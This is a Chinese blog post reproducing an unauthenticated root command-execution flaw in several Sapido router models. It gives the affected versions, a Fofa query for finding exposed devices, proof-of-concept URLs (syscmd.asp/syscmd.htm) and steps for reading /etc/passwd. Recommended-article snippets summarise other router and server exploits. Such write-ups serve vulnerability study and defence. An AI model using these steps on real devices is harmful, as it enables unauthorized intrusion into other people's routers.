Sapido路由器命令执行漏洞

最新推荐文章于 2024-08-05 14:35:20 发布
最新推荐文章于 2024-08-05 14:35:20 发布
阅读量1.4k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/115864338
版权

1.漏洞描述

      Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。

2.影响版本

BR270n-v2.1.03

BRC76n-v2.1.03

GR297-v2.1.3

RB1732-v2.0.43

3.网络资产查找

Fofa:app="Sapido-路由器"

4.POC

http://xxx.xxx.xxx.xxx/syscmd.asp

http://xxx.xxx.xxx.xxx/syscmd.htm

5.漏洞复现

1)访问Sapido路由器web登录页面

2)访问POC进入命令执行页面

http://xxx.xxx.xxx.xxx:1080/syscmd.htm

3)执行ifconfig、cat /etc/passwd等命令

 

chaojixiaojingang
关注
漏洞复现 || Sapido路由器 远程命令执行漏洞
失心少年
07-11 313
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。1.使用POC执行访问存在漏洞的页面,执行cat /etc/passwd命令,得到回显。
Sapido多款路由器命令执行漏洞
内心不种满鲜花就会长满杂草
03-09 6884
影响版本 BR270n-v2.1.03 BRC76n-v2.1.03 GR297-v2.1.3 RB1732-v2.0.43 漏洞实例 fofa搜索 app="Sapido-路由器" poc:ip/syscmd.htm 即可以输入命令执行
小米AX9000路由器CVE-2023-26315漏洞挖掘
最新发布
2301_80127209的博客
08-05 753
一年多前,看到小米SRC公众号推文搞了个赏金活动,于是挖了挖当时比较新的一款AX9000路由器,挖到了两个命令注入漏洞,不过没什么本事,挖的都是授权后的,危害一般。小米给的赏金还是很可观的,但是补丁发布的速度不知为何比较慢(交了这么多厂商,还是Zyxel和华硕的响应速度最快),所以一直也没能分配CVE编号,我也遵守小米的规定在漏洞披露前未公开相关漏洞细节。
WIFISKY-7层流控路由器 后台任意命令执行漏洞复现
m0_49025459的博客
07-11 952
我们成功登录后台之后才能进行任意命令执行漏洞的操作,我们登录之后找到系统维护-系统控制台。然后我们使用命令拼接的操作来实现任意命令执行的操作。这个漏洞相当于是两个漏洞的结合,首先是弱口令漏洞
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 7129
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
1GE+WIFI路由器远程代码执行漏洞
LuckySec
11-30 691
1GE+WIFI路由器存在命令执行漏洞。攻击者可通过弱口令登录后台,远程执行命令
TP-Link 修复热门C5400X 游戏路由器中的严重RCE漏洞
smellycat000的专栏
05-28 119
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士TP-Link Archer C5400X 游戏路由器易受多个漏洞影响,可导致未认证的远程攻击者在设备上执行命令。TP-Link Archer C5400X是一款高端的三频带游戏路由器,旨在为游戏和其它需求较高的应用程序;基于产品在网络商店上的用户评论数量情况,它似乎很受游戏人员欢迎。路由器上的任意命令执行可导致劫持路由器、数据拦截、修改DNS设...
python导入模块报错_Python 导入上层目录模块报错
weixin_29465407的博客
02-10 899
背景:当前demo.py文件,所处目录D:\py\test\TestCase,需要调用test目录下的模块,尝试了新建__init__.py文件+ import test.模块名的方法,无效.报错信息:D:\py\test\TestCase>python demo.pyTraceback (most recent call last):File "demo.py", line 24...
IIB接收SAP请求配置
u011085887的专栏
05-28 301
启用适配器连接项目,以找到 SAP JCo 库以及 JAR 文件和 SAP IDoc JAR 文件 要使 SAP 样本在导入后成功构建,您必须使 SAP Java 连接器 (SAP JCo) 接口库以及 JAR 文件和 SAP IDoc JAR 文件可供“适配器连接项目”使用: 在 Windows 上: 将 sapjco3.dll 依赖关系库复制到本地子目录 C:\SAP_JARS。 将 sapjco3.jar JAR 文件复制到同一本地子目录 C:\SAP_JARS(样本引用该子目录)。 将 sapido
金蝶云星空 CommonFileServer 任意文件读取漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-14 986
金蝶云星空V7.X、V8.X所有私有云和混合云版本存在一个通用漏洞,攻击者可利用此漏洞获取服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
CVE-2021-21402漏洞复现Jellyfin任意文件读取
weixin_52834047的博客
05-10 2245
1.漏洞描述 Jellyfin是一个自由软件媒体系统,在10.7.1版之前的Jellyfin中,攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件,当使用Windows主机作为操作系统时,此问题将变得跟加普遍,该漏洞已在10.7.1版本中修复。 2.影响版本 Jellyfin<10.7.1 3.复现步骤 1.根据关键词在fofa上搜索包含该漏洞的网站 2.访问网站用burpsuite抓包 3.构造URL请求头 jellyfin.db将从服务器下载带有密码的...
Vmware CVE-2021-21972漏洞复现
New Wh1te Hat
03-16 2696
一、漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。 vSphere Client(HTML5) 在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,写入webshell,控制服务器
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
Zeker62的博客
12-23 4298
漏洞内容 文件读取漏洞概述: 文件读取漏洞就是攻击者利用漏洞,可以越级对服务器端文件其他目录进行访问,以此来达到破坏、越权、获取信息等目的。 本漏洞内容: 思科自适应安全设备 Cisco Adaptive Security Appliance (ASA) 软件和思科火力威胁防御 Cisco Firepower Threat Defense (FTD) 软件的 Web 服务界面中存在漏洞,使得未经身份验证的远程攻击者能够执行目录遍历攻击并读取目标系统上的敏感文件。 简而言之,思科代码对恶意URL的注入过滤
漏洞复现 Oracle GlassFish Server 任意文件读取漏洞(CVE-2017-1000028)
nnn2188185的博客
04-16 1175
Oracle GlassFish Server Open Source Edition 4.1版本中存在任意文件读取漏洞。攻击者可借助特制的HTTP GET请求利用该漏洞访问敏感数据。 CVE-2017-1000028 CNNVD-201707-831 CNVD-2017-27302
Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515)
holyxp的博客
11-02 871
Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
做自己喜欢的事,并将其发挥到极致!
08-03 4980
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令
Juniper_RCE漏洞_CVE-2023-36845漏洞复现(附EXP)
m0_64366018的博客
01-15 961
执行命令,先base64编码。
CVE-2010-22005漏洞复现
Foreverlove112的博客
09-21 971
CVE-2010-22005漏洞复现
shiro漏洞复现
weixin_53747497的博客
03-22 1224
Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理, 可用于保护任何应用程序的安全。近年来护网中较多的漏洞。Shiro提供了应用程序安全性API来执行以下方面:1)身份验证:证明用户身份,通常称为用户"登录";2)授权:访问控制;3)密码术:保护或隐藏数据以防窥视;4)会话管理:每个用户的时间敏感状态。上述四个方面也被称为应用程序安全性的四个基石。
路由器ios映像文件_Sapido多款路由器命令执行
weixin_32666923的博客
12-30 506
0x01.漏洞介绍BR270n-v2.1.03 / BRC76n-v2.1.03 / GR297-v2.1.3 / RB1732-v2.0.43 之前版本存在的命令执行漏洞。0x02.固件环境模拟0x03. binwalk解压固件0x04.查看web容器对于嵌入式设备而言,很多服务都是移植开源的,/etc/init.d文件夹下是路由器启动时的加载项,在这些文件中可以看到很多的启动服务等,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值